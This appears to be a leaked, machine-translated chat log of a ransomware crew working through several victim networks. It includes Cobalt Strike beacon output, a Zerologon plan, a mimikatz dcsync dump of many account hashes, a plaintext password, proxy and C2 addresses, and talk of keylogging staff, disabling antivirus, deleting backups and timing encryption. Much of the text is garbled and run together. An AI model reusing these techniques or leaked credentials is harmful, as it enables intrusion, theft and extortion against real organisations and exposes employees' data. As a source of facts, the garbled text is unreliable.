You can always get on the dk if you have a local admin who is in the dsingadano you first got on the dk firstThe standard way and through setntlm back removed logonpasswords and there was the old hash machine accountsmagia)) how?)repaired)we are not just looking for a distant silent serveras dk will be cleaned up in two secondsbecause here the tactic of "hiding in front of everyone" does not workwhich in any case do not fastenNeed to fasten on dk as soon as they will spam can start to clean the network awaybase> pth pkgprod\linux 5c9f2b00a6b5cd75dc76e2adb3369271Authorization through Restore stepsshttps://github.com/dirkjanm/CVE-2020-1472 but we have only one option here: shoot a zerologon on one of the dk, remove the dxink jump to the neighboring dk, take hashdump and hope it's not replicated yet and hash the old machine account. The first dkdo hashdump on the first dkdo zero worked. beacon> shell net user "Administrator" /dom [*] Tasked beacon to run: net user "Administrator" /dom [+] host called home, sent: 60 bytes [+] received output: The request will be processed at a domain controller for domain pkgprod.local. System error 5 has occurred. Access is denied. ``We have to look for a solution to this issue after using domain accounts will not work nowThis is a local admin DCpass mts9475! ``without a domain? beacon> pth .\Administrator 6f2cc106781ba05ddc908d6e32eb1838daCNA option? no via cobalt young, via shapzerlogon done? structured servers, av, nasa, virtualization, etc., then hurry)via zero done? 
beacon> dcsync pkgprod.local [*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:pkgprod.local /all /csv command [+] host called home, sent: 438858 bytes [+] received output: [DC] 'pkgprod.local' will be the domain [DC] '2k12server.pkgprod.local' will be the DC server [DC] Exporting domain 'pkgprod.local' 502 krbtgt d37d5fe30400ee01f2c2d09ba1b36d9a 514 1135 zztest 6f2cc106781ba05ddc908d6e32eb1838 66048 1121 COMPUTER-1$ 9e4861eea9caaf03ab3741219905167e 4096 1125 JODY-PC$ 1be2a00d8363e7aa06a2be68e4e99576 4096 1117 PPCCOMP$ 1fe00279412bc69c535f95a6373c5a05 4096 1138 louisold fd5ee0e622e6f6c7526cc492cd509dc5 512 1143 timesavers eb026d6c093b199f57185a49a9fa324e 512 1148 micro2 1d414494cbe8c70c4321a26bfd6cc59b 66048 1131 DAN-HP$ d14820e4d9433a47e0ceddd48d0a06f6 4096 1130 louis fd5ee0e622e6f6c7526cc492cd509dc5 66048 1141 TONY-PC$ 9c906ae5277d876ace56baad914f0051 4096 1137 PKG-100$ 2817feb5c10f33de5e24b21737abf01b 4096 1119 SUE-PC$ 26efe407363f5d03e502639bd290659c 4096 1128 WENDY-PC$ f5439870ad6502228e07201dc7af491f 4096 1146 TELEMARKETING-H$ e068b3f3a033cd63d111c5bda50b3845 4096 1149 Spare 5af88c4732565f3cff7d8dd1f6ea314f 66048 1166 mtsi cdbb81ea052f92ce3e3a3208dfc2aade 66048 1165 PAC 3179b0258923f6e05ea684640e8e8a42 512 1150 Gretta 7b3785d867105a95e9cef80c4f7a722e 66048 1168 srivera c09783c159543b16d7c4830f743e3e60 66048 1127 jon 5af88c4732565f3cff7d8dd1f6ea314f 66048 1169 TED-LAPTOP$ 16be6f44317f74a831ee08618c6c4afd 4096 1123 TELEMARKET$ 3eb0a5d8c1a23495faa2d2c87b50d71e 4096 1129 JONM-PC$ dbeacb7d9a58c1bcc110c43bccace279 4096 1159 HP-TONY$ eec4fb89b81490d370b9d9ff6cfe1911 4096 1170 mhorgan 640d1d06d738a8ac7104f5ffe9343d5b 512 1140 linux 5c9f2b00a6b5cd75dc76e2adb3369271 66048 1151 FL1 1c145fb415625cbf7eb4a8079a8be5ef 66048 1142 tony 05b073daa9c1b3b909ff5ae2e4604bb5 66048 1132 rmg f0c158a0788788e5dc9e855a35020163 66048 1136 PKG-102$ 946d6fcb5d956bb6de2da361002d06a6 4096 1120 barb 50172476292c7784efcdf8da9d415a8f 66048 500 Administrator 
6f2cc106781ba05ddc908d6e32eb1838 66048 1162 jess 9bed08d5afa9d00f06ff943c9fedd570 66048 1144 micro 1d414494cbe8c70c4321a26bfd6cc59b 66048 1116 telemkt 0dc70321eb7dd2aaf63e3e3f0d520dc3 66048 1139 PKG-101$ 57fd8fff3a57275d47ed819e98fb293d 4096 1133 frontdesk 5af88c4732565f3cff7d8dd1f6ea314f 66048 1118 jen 67ba48f6c118b9c433a79a40d1ba5984 66048 1152 FL2 1c145fb415625cbf7eb4a8079a8be5ef 66048 1147 TIMECLOCKSQL$ 4f4f2298cdbb4564c82a43d570de2d 4096 1163 SALES1-HP-2019$ 511e98171aea1fa8da652bb7a4706523 4096 1134 FRONTDESK$ a4ef2d7813cc54616741cb7c09a0fbb9 4096 1160 BARBARA-HP-2019$ 17ad6d135f6f1a081e66b72e07541519 4096 1124 jody 13cdef39a416a4c50618630f7be02479 66048 1161 SALES2-HP-2019$ 83832d2cd61cfa87e26aee2548d6eced 4096 1126 wendy 9bed08d5afa9d00f06ff943c9fedd570 66048 1145 tele d7e35af358caba17dd77018cb86fb87d 66048 1167 Ted dd7a02d47fe222b5091ef2974c69b2ec 66048 1001 2K12SERVER$ 31d6cfe0d16ae931b73c59d7e0c089c0 532480Creates null files then we'll leave it for tomorrow beacon> pwd [*] Tasked beacon to print working directory [+] host called home, sent: 8 bytes [*] Current directory is C:\ProgramData\Adobe beacon> run AdFind.bat [*] Tasked beacon to run: AdFind.bat [+] host called home, sent: 28 bytes [+] received output: C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=person)" 1>ad_users.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials Terminating program. C:\ProgramData\Adobe>adfind.exe -f "objectcategory=computer" 1>ad_computers.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials Terminating program. C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=organizationalUnit)" 1>ad_ous.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials Terminating program. 
C:\ProgramData\Adobe>adfind.exe -subnets -f (objectCategory=subnet) 1>subnets.txt
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.
C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=group)" 1>ad_group.txt
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.
C:\ProgramData\Adobe>adfind.exe -gcb -sc trustdmp 1>trustdmp.txt
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.
but it does not let you pull AD?
all pinged
did not check it pinged?
when taking data it wrote that the controller is not available
just the DC is not available?
i did not find the software for the vpn
hm, behind a vpn?
domain is not available, kerbs are not pulled
is there an Exchange in the network?
ad info updated? kerbs re-pulled and so on, found the creds for the transition.
Brute on the list interrupted, hangs the PC (does not go to them, but for some reason shows it not adminshare trap adminshare there
``.
\TIMECLOCKSQL.pkgprod.local\ADMIN$ - Remote Admin \TIMECLOCKSQL.pkgprod.local\C$ - Default share \TIMECLOCKSQL.pkgprod.local\IPC$ - Remote IPC [+] received output: \FRONTDESK.pkgprod.local\ADMIN$ - Remote Admin \FRONTDESK.pkgprod.local\C - \\Default share \\{\FRONTDESK.pkgprod.local\D$ - Default share \FRONTDESK.pkgprod.local/IPC$ - Remote IPC \\Print$ - Printer Drivers \FRONTDESK.pkgprod.local/Users - [+] received output: \Sales2-HP-2019.pkgprod.local\ADMIN$ - Remote Admin \Sales2-HP-2019.pkgprod.local\C$ - Default share \Sales2-HP-2019.pkgprod.local\IPC$ - Remote IPC \Sales2-HP-2019.pkgprod.local\print$ - Printer Drivers \Sales1-HP-2019.pkgprod.local\ADMIN$ - Remote Admin \Sales1-HP-2019.pkgprod.local\C$ - Default share \Sales1-HP-2019.pkgprod.local\IPC$ - Remote IPC \Sales1-HP-2019.pkgprod.local\print$ - Printer Drivers \\{\PKG-102.pkgprod.local\ADMIN$ - Remote Admin \\{\PKG-102.pkgprod.local\C$ - Default share \\{\PKG-102.pkgprod.local\D$ - Default share \\{\PKG-102.pkgprod.local\E$ - Default share \PKG-102.pkgprod.local\IPC$ - Remote IPC \PKG-102.pkgprod.local\print$ - Printer Drivers [+] received output: \PKG-101.pkgprod.local\ADMIN$ - Remote Admin \PKG-101.pkgprod.local\C$ - Default share \PKG-101.pkgprod.local\D$ - Default share \PKG-101.pkgprod.local\E$ - Default share \\{\PKG-101.pkgprod.local\G$ - Default share \PKG-101.pkgprod.local\IPC$ - Remote IPC \\Print$ - Printer Drivers \\{\Barbara-HP-2019.pkgprod.local\ADMIN$ - Remote Admin \\{\Barbara-HP-2019.pkgprod.local\C$ - Default share \Barbara-HP-2019.pkgprod.local\IPC$ - Remote IPC \Barbara-HP-2019.pkgprod.local\print$ - Printer Drivers \\2k12server.pkgprod.local/ADMIN$ - Remote Admin \2k12server.pkgprod.local\C$ - Default share \2k12server.pkgprod.local\IPC$ - Remote IPC \\{\2k12server.pkgprod.local/NETLOGON - Logon server share \2k12server.pkgprod.local\Shares - \2k12server.pkgprod.local\SYSVOL - Logon server share ``We're still looking for other options about clearing out the exe, tomorrow we'll 
decide ``C:\Users\jess\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1`` have you heard anything from them? ``give me kobukak too many fuck-ups setoknu if off, then give me then also grid#skytechinc-com from esxi looking for#henrystreet-org creeds from the sphere looking for so what are you doing? hiuser3 stuck in traffic, but so all come? hi:space_invader:all say goodnight do tomorrowto 5okay then for today alla, got them in the network 5 not, there are only three in the sphere[ ](https://mediaeveryonecom/channel/general?msg=La7JvzhF8okm35g2o) mb to dump? and some creeds are from trastav #corp-televisa-com-mx untwisted and snuck into the servak, got new creeds, tomorrow as someone will be available on the other machine and think the DK will getaustavlja to find kerds from two esxi and everything is ready found two more nasa with backups, 4 in total found the kerds from the sphere, there are three esxi, but there are 5 on the network, we need to find 2 more passwords #henrystreet-org scanned the ports and checked all the web mordas, no esxi and sphere, the kerds are in progress. Of at least something worthwhile I found: Describe what you've done today. 
``Just leave the proxy you gave me for the mail server sessions and the rest of them will probably be on pnsvejsdemand me their browsers again''. 
CurrentUser : WATERWAY\mharper Idletime : 00h:46m:59s:672ms (2819672 milliseconds) ``` ``` CurrentUser : WATERWAY\gkeller Idletime : 02h:09m:38s:235ms (7778235 milliseconds) ``` ``` CurrentUser : WATERWAY\mapusatera Idletime : 06h:51m:32s:968ms (24692968 milliseconds) ``` ``` CurrentUser : WATERWAY\djarden Idletime : 03h:05m:02s:093ms (11102093 milliseconds) ``Screens - lock screen with no movement? If they do not come, then we roll over for half an hour, monitor the servers until the session sleeps for a longer interval still hope that they will come for half an hour readiness they have gone .... this is gkeller`` `` ====== IdleTime ====== CurrentUser : WATERWAY\gkeller Idletime : 01h:43m:42s:781ms (6222781 milliseconds ``wait a minute exactly greega the rest are alive?`` bliaoff comp7harper is out5 minutes ready slack accesses are there? @ot wake up you lost a screenshot of harperdate where do we have office? screenshots are taken regularly and check for shuughts you watch for admins active in 10 minutes we will write10 mins great server now what was backups? backups are ready? disk raster ready nimbles are open nimblc and rock spice are ready[ ](https://mediaeveryone.com/group/waterway-com?msg=Jzd3FE6Gachm5XwXx) ?you know what to prepare? ready 10 mins vpnom problems so fardid you deploat the batnom kill the processes? 
``I'm giving you access to 3 locations. Didn't you find a backup? Let's ping them all and be ready to go. Thanks @user4 there is already SharpSharesNG so you can prepare automation of the Deployment of the Domain Admins Deployment Script 
``Or if you drop the coba you will have a vpn immediately run the build so if the paleo starts (will monitor the admins) and you will already be on the servers by this time so we will throw vpn in the net there) I said will not turn us immediately after the letter about nimbles?all 5 people in the case, between you distribute the role of all on the timing, you need to do almost instantly all do not forget to delete all external backs that were in case they drop the kobut e you run on the machine dll, I give you ovpn configs + dedication, you all up and here you are behind a wpn in the network 2 entry points in this case I prepare you a wpn bridges to the networkThe important thing is that during a raid, the cobu can be dropped from the networka, yes, okie mapping will not even have) armas you can share over the network so here timing is very important may raise a raid and we will have little time to the lock[ ] (https://mediaeveryone.com/group/waterway-com?msg=idpvE2JA95NfNYsao) + zamaplyene armas? or lock without nimble and lock or we get a pass from nimble and do remuv all bakaptut everything simpleto just run the build by this time you should be attracted to all servers in kobucha got access immediately logged in sketched backups with the file size if any and deleted all that can `` WWDC2 WWDC1 MSSQL-- PDIPRODWEB PDIPRODSQL PDITESTSQL WWSQL WWSQL2 WWSQL02 REPORTING WWSQLOLD WWSQL2OLD TERMSRV-- PDITESTWEB WATERWAYDSC02 WW2K1OLD PDIPRODWEB2016 WW2K1 Hyper-V Server-- WWHV-CLUSTER-1 WWHV-CLUSTER-2 WWHV01 WWHV02 WWHV03 WWHV04 WWHV63 ``and you wait for accesses to do everything in +- 1-2 minutes e.g. sox + url vbits prepare accesses to nimbla at once''. on AD total cars - 310 win serv - 16 hyper-v server - 7 arm - 287 ``out of the two that I have discounted immediately here build give me one server and user? ok, let's break down the strategy they have time out 30 minutes sawdjarden with her browser checked? 
mharper[ ](https://mediaeveryone.com/group/waterway-com?msg=eYrHKvzmgSGPvEQs7) whose dock? everything works, do not confuse me she has the keylog hanging from it did you see her car? dn:CN=Dianne Jarden,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com >objectClass: top >objectClass: person >objectClass: organizationalPerson >objectClass: user >cn: Dianne Jarden >sn: Jarden >description: IT I will find valid ones error writes error`` blauer gkeller mharper mpusatera ``who had the nimble? @user7 for how long? I need his mail and the mail of the second cunt tickets are created to help or something like that I think it is HelpDesc*nogo anyway yanked from the neo mharper[ ](https://mediaeveryone.com/group/waterway-com?msg=ERNTLyZqow7H3bsNB) do not think he is a living person mainly at @user7 he's gone ``setg Proxies socks4:185.150.189.165:29528 give me the socks and access to the mail guys on the nimblyw slack? mail is quiet? 
nothing in the keylog, unless they run around the office and ask if the shuheradmins lifted the shukheeratorak web so sshern there and not the brute in the lock ip flies away after +- 10 tries as well as rootv loginsadmins still with a capital letter into the prelocke batnick throw a kilo process asus service backupafter an hour discuss a plan of action because here the approach is not trivialda[ ](https://mediaeveryone.com/group/waterway-com?msg=oo9XiRA9tCdeANuK8) has not yet we'll do it soonthere was an archive with files? start at 1:30https://192.168.0.75/#/login on mail i only saw the alert of successful authorization for the 20th year so you were brutal before that there were alerts? in general before the brutal question they have an alert at the entrance to the mail There's a good chance there'll be an alert on the override/erroneous pass as well. is it worth it? ``admin admin and root logins of the two utakkova think max diap 5 variants is not clear which login is needed.The problem is also that I tried with different variations of login (with @ with \ and just login) let's go back to the idea of bruta say that in the monitoring shows that they are in vg, as well as nasa so can it in vg then?)in ad_computers not see in ad_computers is? ``` nimbles: https://192.168.0.42 https://192.168.0.43 https://192.168.0.75 https://192.168.0.77 ``Is it in the AD as such? Is nimbles in the domain? Maybe unlimited but on the other hand, how many login attempts have we made on nimbles are tied to adno by known data is it in the domain is on nimbles? Lockout threshold: 15 ``there is an unlimited number of attempts? + all the hashes from the domain and brute force let's collect the top passwords in the last couple of years, even 16 in hell and on the servers wild garbage removed as a grid dalitak and was, on hell17 servers? 
and before that and was? or they got wind of it? on backups all the computers on the network with "backup" either don't piggyback or don't get it. The few that are alive are on the c drive and there's no backup. Only 17 servers, I found only database backups, site, etc. I'll check with workgroup, but I have a feeling that they either pour backups into nimbrel or do not do them at all :) which is unlikely, because computers with a prefix backups give the impression that they are restored from the backups, so they are called that and burn) Teemo[WWSQL]SYSTEM */976|2021Jan15 03:11:21> portscan 192.168.0.105 1-10000 icmp 1024 [*] Tasked beacon to scan ports 1-10000 on 192.168.0.105 [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete `````` Teemo[WWSQL]SYSTEM */976|2021Jan15 03:09:54> shell net view \192.168.0.105 /all [*] Tasked beacon to run: net view \\192.168.0.105 /all [+] host called home, sent: 60 bytes [+] received output: System error 53 has occurred. The network path was not found. ``No view does not work, 3389 does not work, no other ports looked at? Description = The RPC server is unavailable. ``what's up with rps and no view? backups without 445`` beacon> shell ping -n 1 CLEBACKUP.waterway.com [*] Tasked beacon to run: ping -n 1 CLEBACKUP.waterway.com [+] host called home, sent: 75 bytes [+] received output: Pinging CLEBACKUP.waterway.com [192.168.0.105] with 32 bytes of data: Reply from 192.168.0.105: bytes=32 time=7ms TTL=64 Ping statistics for 192.168.0.105: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 7ms, Maximum = 7ms, Average = 7ms beacon> portscan 192.168.0.105 445,21,22,3389,443 [*] Tasked beacon to scan ports 445,21,22,3389,443 on 192.168.0.105 [+] host called home, sent: 75377 bytes [+] received output: (ICMP) Target '192.168.0.105' is alive. [read 8 bytes] [+] received output: Scanner module is complete ``by the way very interesting stuff.... 
but it won't compile i'm looking for the code, this thing should theoretically work - https://github.com/amitwaisel/Malproxy/tree/master/ѕгсв patched) tried a sox mimic and it didn't work as expected I can't deploy VPN - cobalt won't deploy because win 10 doesn't support it. Any other VPN client they do not use.so it makes sense to try it by the way on the lab as I remember dk not patchedbut you need to be absolutely sure that will work) in principle you can try it on labenea, I have not tried if i try it now, there will be a big chance that already cleaned the network, because if now it will not work and the second time broke dk - admins something or something will suspect) `` `` this line probably doesn't work because CS has an old mimic ``` and through soks or vpn not try to start the ac? on smbgost on the network - nothing left to fill upHe raised the form, configured.and tomorrow at 11 write down the result of today in the groupmaximum time to 11 canEveryone should go 1:30This is a very bad timea Why so early?tomorrow by 10 to 9Today I'm not long on computers How's it going? scanning subnets from ad_subnets - looking for where I admin read the documentation on psh empireDetail progress on the tasks I've done what I'll just deal with youIt turns out that only @user8 is free?i'm with the same sessionnu since the foprump then ok raise the foprump me asu.eu? apparently, i personally do not have a task yet finished with vpc just a few minutes ago, on the nets what you have on tasks?:space_invader:hi there,hi all hello prietvethe ok, Stalin said that he will be delayed by yesterday's business hours to 8 tomorrow waiting for a new rocket in the near future to decide how long will it be? but each computer has the appendixprivethe hey, we have when the last router died, we took a microtic and it somehow very bad works VPN from nord, the speed zhut. 
We are still using apps to connect, now we take another vpnprivet why vpn not on the router is that NAS-D5-E2-B8 just now) I'm in all go to the other rock we keylogged them via SI catch on nimblebut will call to write water nimble? in 4 will nimbletam not before 6 okay you're right, but I will add that when I said about the ehe I laid down similar outcomes) I'm not to blame that the trick can not chew dll) do not beat a lying))))) what about the failure of ehe and fuck it how so ...aha got it, please let me know how it will be loaded - I have interruptions with cases for onlinenikov today(( they do not work with what (here I thought from the trike to take something, and a clean ehehe that do not have .... more last week agreed and today ustraget said it will, right? progruz, where the hzya read today, some new cases will be loaded with uk? as you there? hello `` Hello? LEEFILTERS.UK ============= Domain Controllers LEEPDCVM LEE-DCON-01 ------------------- Sage/SQL LEESQL LEESAGEVM LEEAPPVM ------------------- Backup Server LEESTORE ------------------- Qlikview Server (Qlik provides an end-to-end platform which includes data integration, user-driven business intelligence and conversational analytics) LEEQLIKVM QVWEBLIVE QVAPPLIVE QVAPPTEST LEEPUBAPP01 ------------------- EXCHANGE LEEMAILVM ------------------- File Storage Server LEEDATA ------------------- Replication Server LEEREP ``For now, play with the testing tools please excuse me friends, with the sessions so far a little stupor, probably in a couple of hours will be solved maybe earlierwould give new sessions (okseny now will try to make up, backdoor fell off just domain where the backdoor was dead all who were alive? goodnight goodnight goodnight no sessions. Will there be any new ones? Good morning:flag_il:Night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night. 
https://vpn.floridapoly.edu ``` I'm on a VPN on my hard drive. Checked the network for ms17\bluekeeper\smbghost (selectively) - all bypassed. there is still a way to find out dc and check it on the zerologon so we will be late late we will close the network tomorrow by 3 write statuses in groups have tried several versions of ms17 no good. I've scanned the network. There is one ``. Host is likely VULNERABLE to MS17-010! ``` but ``` [-] 10.200.101.73:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30) ``message my status to the groupwho finished rdp only two snapshots, write the password and what can I do snapshot@tl1 add me to @user4 in the group pleasewill you restore the dedication, pack all data keepass, but how can I do to 9000 with vpn could hook up?) like yesterday I'm digging in the dedicke, vpn yesterday's network deployed who do what? it's on the setting rpn do not create new users, change the pass and work with the current one is not enough from 2424? and I already put a new password of at least 30 characters, including letters, numbers and symbols @user4 network is almost dismantled, I must finish with her today. 2 people to help him will be allocated, there is a fairly large network so it is likely that today we will be a long time sessions are expected to check the power settings on the OS to not go to sleep then 10 it will not be a month I'm on the old place 2 people? 
3,7,8 dropped the one that is possible to leave the 10 let it be 10lubomne 16 all on the spot write what granddick you want (10,16) I'll give you access in person you set up for yourself, install the software and change the password from your account send me the new password i give you a snapshot of the current state to be able to roll back to the configured arrow as soon as everythinga although let's not wait another 7 minutes the rest of it yes199.241.189.58 seems alive - i meant your basic that originally gave you stayed 2 already took away that temporary gave you which already have, it can keep? 3 vin 10 and 3 vin 16 rdp come up yet? ``` smb_version rhosts="name_domain" ``` found slightly more cars than 1 There's ``mcklrh.mig: ``` [+] 192.168.254.92:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC01) (domain:MCKLRH) [+] 192.168.254.93:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC02) (domain:MCKLRH) [+] 192.168.254.107:445 - Host is running Windows 2003 R2 SP1 (build:3790) (name:NSERV4) (domain:MCKLRH) ``` Here ``ffmg.local'': ``` [+] 10.10.39.73:445 - Host is running Windows 2003 SP2 (build:3790) (name:CLINICDC) (domain:FFMG) ``` The existing EA (`svc-aadc`) does not have admin rights in both domains Checked for `ms17`: Here `ffmg.local' is silent. Here `mcklrh.mig ` there is a vulnerability on server 2003. I added LA, I couldn't get it to work in cob, or tpsh, or metapreter. Tried to remove ADinfo, no luck. It either gave 0 objects, or hung, or with an ` ERROR: 0x1` error. 
Tried to remove both by dropping the executable and remotely through: ``` -b DC=mcklrh,DC=mig -h 192.168.254.107 ``` I ran the loads through `wmic`, `psexec`, `ms17_010_command` - no hu me So far there are only DA and EA lists from the `mcklrh.mig' domain ``` The request will be processed at a domain controller for domain mcklrh.mig. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator klr test3 testpacs The command completed successfully. ``` ``` The request will be processed at a domain controller for domain mcklrh.mig. Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator ali The command completed successfully. ``adfind.exe -f "(objectcategory=person)" -h x.x.x.x> ad_users.txt:thumbsup:to keep you from getting bored with the currentuser4user7 networks. It looks like passwords are transmitted in the zoom I don't think we'll be able to close it tomorrow)) I'm still gathering information about it all. I don't think we'll be able to close it today 10 domains + we need to catch the AB and spheres creeds somewhere...https://www.solarwinds.com/it-security-management-tools yes, is not an AB at all...?[ ](https://mediaeveryone.com/group/wilsonart-com?msg=9dZhAJKePR46j6kT3) .evil shit? + this is the domain where we are. TECHNISTONE.LOCAL - can't get through, no overlap of users and users/groups from other domains with permissions WI.RWP.COM is some kind of a dead domain, just wine 2003 ``` WILSONART.COM + CN.WILSONART.COM + RALPHWILSON.COM + ARBORITE.COM + POLYREY.NET + EU.WILSONART.COM + UK.WILSONART.COM + BUSHBOARD.CO.UK + SLF.LOCAL + RESOPAL.LAN + TECHNISTONE.LOCAL no intersections WI.RWP.COM 2003 mb old/inactive domain POLYREY.COM Quarantined RESOPAL.GER Quarantined ``Lists of servers/arms from all domains ``` beacon> shell ping polyrey.com [*] Tasked beacon to run: ping polyrey.com [+] host called home, sent: 47 bytes [+] received output: Ping request could not find host polyrey.com. Please check the name and try again. ``` ``` beacon> shell ping resopal.ger [*] Tasked beacon to run: ping resopal.ger [+] host called home, sent: 63 bytes [+] received output: Ping request could not find host resopal.ger. Please check the name and try again. 
`````` WILSONART.COM + CN.WILSONART.COM + RALPHWILSON.COM + ARBORITE.COM + POLYREY.NET + EU.WILSONART.COM + UK.WILSONART.COM + BUSHBOARD.CO.UK + SLF.LOCAL + RESOPAL.LAN + TECHNISTONE.LOCAL no intersections WI.RWP.COM 2003 mb old/inactive domain POLYREY.COM Quarantined RESOPAL.GER Quarantined The new one is not a new koba, but the new koba is a new koba, and the new koba is a new koba, and the new koba is a new koba. yesterday there were two new ships and in the two new ships nothing flies really) well, and in the new ships it flies) with the commands and stuff like sysinfo the server behind the dk and whether it has an open off-site)) yes, two ships were open, I chose https, but it comes from another ship) to another ship or what?)you on which one you picked up what?)your listener graph is empty so to speak)) what listener did you pick up?)` *** 23623423 has joined.i'm fucked too) lol)[ ](https://mediaeveryone.com/group/wilsonart-com?msg=qWzDq9uNAzyugQTq7) what dk was 2016 in the new at least someone raised a new listener? that one was for dk also 12? dll from the new coba is the same and so and so you said you ran on 1 server on the intranet through dk?[ ](https://mediaeveryone.com/group/wilsonart-com?msg=Gi5oBnXfNwZvCKHaY) from the main can not see, from another can see on dk and ran[ ](https://mediaeveryone.com/group/wilsonart-com?msg=2tfBQPqopYGz2bZyZ) yes `resopal.lan ``` beacon> shell dir \\172.22.198.11\C$ [*] Tasked beacon to run: dir \\172.22.198.11\C$ [+] host called home, sent: 53 bytes [+] received output: The trust relationship between the primary domain and the trusted domain failed. ``Or. regsvr32 file.dllStart: rundll32 file.dll, StarkWhite command to run dll Depatam where you run for dk was also 12? ddl can not see the server directly? tried, dll seemed to work on the server from this domain, but no session[ ](https://mediaeveryone.com/group/wilsonart-com?msg=zBMzgRhYxLtjfEr7S) through dk further get through?seesvneshku see? 
yesterday one threw in #toolsranel give more sysinfo these servers i am purely testing and ruling out options) i will certainly try, but purely my opinion) that it is not in the cob and that our dll does not work on these 2012 dk try here clean coba `` 108.62.12.143 https://askside.com ---------------------------------------------------------------------------------------- 104.194.10.161:53256 KtdyhCtQUR4qWj0JfZd45Gn7ivsiLJ5sILi no, only simanteclose it already cut off everywhere AV through the admin and go quietly, there is something besides AV? it does not show as AV, maybe a scanner or a sensorkak how to close it) to the domain to pass))) everywhere turned off the possibility of complete disabling of AV for what session?although there is a risk that the admins will see the break with the agent no right to completely disable the protection and pull the bindpipe and raise it back? but i noticed that the crash only on 2012 on those that have worked i added it to exceptions and ran it after the avs passed - the session came from the dll is not deleted but crashes our dll strayed, added to exceptions, it runs and crashes after the avp went through me? on some dk the dll started after that and the session came flying added dll to exceptions avp as a consequence crashes most likely detects shellcode and cuts out of the dll came by rdp ran the dll window popped up - operation stopped.... how did you determine what was crashing? but this is risky and you need to kill everything at once as an alternative to kill simantec (it is administered from the main domain) and try to bindpipe other domains[ ](https://mediaeveryone.com/group/wilsonart-com?msg=KoqSvFWfFHfCdEq3Q) we need to solve the problem now, otherwise we won't be able to close it today. 
14 domains in total 4 have sessions 7 have access, but no sessions from there >description: Veeam Backup Server >dNSHostName: bod01-bkp01.eu.Wilsonart.com `````` >description: Vcenter Server >dNSHostName: bod01-vce01.eu.wilsonart.com `````` >description: Veeam Backup Server >dNSHostName: dcveeam01.Wilsonart.com `````` >description: VMware vCenter 6.0 Server >dNSHostName: dcwas79.Wilsonart.com ``` ``` >dNSHostName: nas_signature.polyrey.net ``tl1 our dll crashes on 2012window, I turn on yesterday's dll from depaav does not see them there is also WI.RWP.COM, there everything on 2003 and arboright crashes after starting uk and eu dlls on 2012, there are clean dlls on startup crashingsessions do not stretch all that _NTLM, taken remotely, except wilsonart.com pair seem to be in quarantine, but pings all the way through it is active? uk.wilsonart.com arborite.com eu.Wilsonart.com resopal.lan polyrey.com resopal.ger ``go to closingh polyrey.net\adm-cavailj 99f09cbd168ec7f38bf4981a884f082cWe all have a good weekend on Mon by 1pm remove files in slipstreams well worth a try*try msf try? different loads, ports i ask if anything, do not waste time)@user3 already a few days it bangs it sits next to you therea information as i understand by tpsh no?:#sisd-net let's leave for another day today until 12:skull:so it is already dead)there stall should be up to 40 seconds11 minutes pingingnyayaat something like ACADEMIC.NET should not see there your in tpsh flew to user3 and what to do with it then?i can't see how to do anything else with it!) how to spam it from usera (i'll try it in ptsh ghbktntkf jn .pthf 9 and no other variants? it's probably portne, it does not bitemakafitam still try what av? there are a couple more rpn:disappointed:no there are no avs did not start it, try different options cobalt load - the session does not come there are any other options to get the session? 
or AV cuts the connection as an option - there is a whitelist for IP on the TCP connection pinged but the process hangs and no session in general summing up not the fact that there is no output traffic on the 443 portd) I have not checked...copied from the Russian-language resource? and I see there ?????? 443 ?????????????dir=INlocalport 443 action=allow dir=IN you use a rule for the firewall and for that matter if it is not there, then the software on your machine does not have a software that keeps 443 open-most likely there would be a web server if the netstat was 443 port local open 139 445 and so e shows just open ports more role flag-anetstat -nikak, assumed the netstat does not have it how did you determine that 443 is closed? daleenet) the question about the busy port is relevant? in other words, the current machine through 57431 port makes a request to 172....195:443 on the right remote + port as you see on the left is the local address and port is the netstat hat``` Active Connections Proto Local Address Foreign Address State ``that is, the port is busy with your coba? `s external[ ](https://mediaeveryone.com/channel/general?msg=B2vsb4MHfdZiYoRMP) ip 172. what is it? read[ ](https://mediaeveryone.com/channel/general?msg=AHk7aiQJYEZN9R4Tw) read the last 30 messages, well, we need to change the port or redirect the session on 443 by idea should not come to me on what? all responded? on cmb link445 on cmb, it turns out, too i have not tried, but i think on the 80th you can raise the session on me on i zumeroka you do not smoke? ok i will wait all kureyatsko rather than yes to long they?i'm in my office and i see that they're not there i have all "online" status some are away for now@user8 is responsible for all? won't come[ ](https://mediaeveryone.com/channel/general?msg=6Pib9yhKR6fKGMYDj) this[ ](https://mediaeveryone.com/channel/general?msg=vkaZGMZbNa7du9uhB) or this[ ](https://mediaeveryone.com/channel/general?msg=rEMML3ycEFazRDrxT) this one which one? 
